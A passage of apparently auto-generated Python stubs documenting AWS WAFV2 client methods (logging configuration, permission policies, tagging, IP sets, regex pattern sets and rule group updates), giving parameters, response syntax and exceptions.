:param LoggingConfiguration: [REQUIRED]\n\nResourceArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the web ACL that you want to associate with LogDestinationConfigs .\n\nLogDestinationConfigs (list) -- [REQUIRED]The Amazon Kinesis Data Firehose Amazon Resource Name (ARNs) that you want to associate with the web ACL.\n\n(string) --\n\n\nRedactedFields (list) --The parts of the request that you want to keep out of the logs. For example, if you redact the cookie field, the cookie field in the firehose will be xxx .\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe part of a web request that you want AWS WAF to inspect. Include the single FieldToMatch type that you want to inspect, with additional specifications as needed, according to the type. You specify a single request component in FieldToMatch for each rule statement that requires it. To inspect more than one component of a web request, create a separate rule statement for each component.\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax{
'LoggingConfiguration': {
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
}
Response Structure
(dict) --
LoggingConfiguration (dict) --
ResourceArn (string) --The Amazon Resource Name (ARN) of the web ACL that you want to associate with LogDestinationConfigs .
LogDestinationConfigs (list) --The Amazon Kinesis Data Firehose Amazon Resource Name (ARNs) that you want to associate with the web ACL.
(string) --
RedactedFields (list) --The parts of the request that you want to keep out of the logs. For example, if you redact the cookie field, the cookie field in the firehose will be xxx .
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The part of a web request that you want AWS WAF to inspect. Include the single FieldToMatch type that you want to inspect, with additional specifications as needed, according to the type. You specify a single request component in FieldToMatch for each rule statement that requires it. To inspect more than one component of a web request, create a separate rule statement for each component.
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFServiceLinkedRoleErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'LoggingConfiguration': {
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
}
:returns:
Associate that firehose to your web ACL using a PutLoggingConfiguration request.
"""
pass
def put_permission_policy(ResourceArn=None, Policy=None):
"""
Attaches an IAM policy to the specified resource. Use this to share a rule group across accounts.
You must be the owner of the rule group to perform this operation.
This action is subject to the following restrictions:
See also: AWS API Documentation
Exceptions
:example: response = client.put_permission_policy(
ResourceArn='string',
Policy='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the RuleGroup to which you want to attach the policy.\n
:type Policy: string
:param Policy: [REQUIRED]\nThe policy to attach to the specified rule group.\nThe policy specifications must conform to the following:\n\nThe policy must be composed using IAM Policy version 2012-10-17 or version 2015-01-01.\nThe policy must include specifications for Effect , Action , and Principal .\nEffect must specify Allow .\nAction must specify wafv2:CreateWebACL , wafv2:UpdateWebACL , and wafv2:PutFirewallManagerRuleGroups . AWS WAF rejects any extra actions or wildcard actions in the policy.\nThe policy must not include a Resource parameter.\n\nFor more information, see IAM Policies .\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidPermissionPolicyException
:return: {}
:returns:
ResourceArn (string) -- [REQUIRED]
The Amazon Resource Name (ARN) of the RuleGroup to which you want to attach the policy.
Policy (string) -- [REQUIRED]
The policy to attach to the specified rule group.
The policy specifications must conform to the following:
The policy must be composed using IAM Policy version 2012-10-17 or version 2015-01-01.
The policy must include specifications for Effect , Action , and Principal .
Effect must specify Allow .
Action must specify wafv2:CreateWebACL , wafv2:UpdateWebACL , and wafv2:PutFirewallManagerRuleGroups . AWS WAF rejects any extra actions or wildcard actions in the policy.
The policy must not include a Resource parameter.
For more information, see IAM Policies .
"""
pass
def tag_resource(ResourceARN=None, Tags=None):
"""
Associates tags with the specified AWS resource. Tags are key:value pairs that you can associate with AWS resources. For example, the tag key might be "customer" and the tag value might be "companyA." You can specify one or more tags to add to each container. You can add up to 50 tags to each AWS resource.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceARN='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource.\n
:type Tags: list
:param Tags: [REQUIRED]\nAn array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(ResourceARN=None, TagKeys=None):
"""
Disassociates tags from an AWS resource. Tags are key:value pairs that you can associate with AWS resources. For example, the tag key might be "customer" and the tag value might be "companyA." You can specify one or more tags to add to each container. You can add up to 50 tags to each AWS resource.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceARN='string',
TagKeys=[
'string',
]
)
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nAn array of keys identifying the tags to disassociate from the resource.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def update_ip_set(Name=None, Scope=None, Id=None, Description=None, Addresses=None, LockToken=None):
"""
Updates the specified IPSet .
See also: AWS API Documentation
Exceptions
:example: response = client.update_ip_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
Description='string',
Addresses=[
'string',
],
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the IP set. You cannot change the name of an IPSet after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type Description: string
:param Description: A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
:type Addresses: list
:param Addresses: [REQUIRED]\nContains an array of strings that specify one or more IP addresses or blocks of IP addresses in Classless Inter-Domain Routing (CIDR) notation. AWS WAF supports all address ranges for IP versions IPv4 and IPv6.\nExamples:\n\nTo configure AWS WAF to allow, block, or count requests that originated from the IP address 192.0.2.44, specify 192.0.2.44/32 .\nTo configure AWS WAF to allow, block, or count requests that originated from IP addresses from 192.0.2.0 to 192.0.2.255, specify 192.0.2.0/24 .\nTo configure AWS WAF to allow, block, or count requests that originated from the IP address 1111:0000:0000:0000:0000:0000:0000:0111, specify 1111:0000:0000:0000:0000:0000:0000:0111/128 .\nTo configure AWS WAF to allow, block, or count requests that originated from IP addresses 1111:0000:0000:0000:0000:0000:0000:0000 to 1111:0000:0000:0000:ffff:ffff:ffff:ffff, specify 1111:0000:0000:0000:0000:0000:0000:0000/64 .\n\nFor more information about CIDR notation, see the Wikipedia entry Classless Inter-Domain Routing .\n\n(string) --\n\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextLockToken': 'string'
}
Response Structure
(dict) --
NextLockToken (string) --
A token used for optimistic locking. AWS WAF returns this token to your update requests. You use NextLockToken in the same manner as you use LockToken .
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def update_regex_pattern_set(Name=None, Scope=None, Id=None, Description=None, RegularExpressionList=None, LockToken=None):
"""
Updates the specified RegexPatternSet .
See also: AWS API Documentation
Exceptions
:example: response = client.update_regex_pattern_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
Description='string',
RegularExpressionList=[
{
'RegexString': 'string'
},
],
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the set. You cannot change the name after you create the set.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type Description: string
:param Description: A description of the set that helps with identification. You cannot change the description of a set after you create it.
:type RegularExpressionList: list
:param RegularExpressionList: [REQUIRED]\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single regular expression. This is used in a RegexPatternSet .\n\nRegexString (string) --The string representing the regular expression.\n\n\n\n\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextLockToken': 'string'
}
Response Structure
(dict) --
NextLockToken (string) --
A token used for optimistic locking. AWS WAF returns this token to your update requests. You use NextLockToken in the same manner as you use LockToken .
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def update_rule_group(Name=None, Scope=None, Id=None, Description=None, Rules=None, VisibilityConfig=None, LockToken=None):
"""
Updates the specified RuleGroup .
A rule group defines a collection of rules to inspect and control web requests that you can use in a WebACL . When you create a rule group, you define an immutable capacity limit. If you update a rule group, you must stay within the capacity. This allows others to reuse the rule group with confidence in its capacity requirements.
See also: AWS API Documentation
Exceptions
:example: response = client.update_rule_group(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
Description='string',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
VisibilityConfig={
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the rule group. You cannot change the name of a rule group after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type Description: string
:param Description: A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
:type Rules: list
:param Rules: The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples 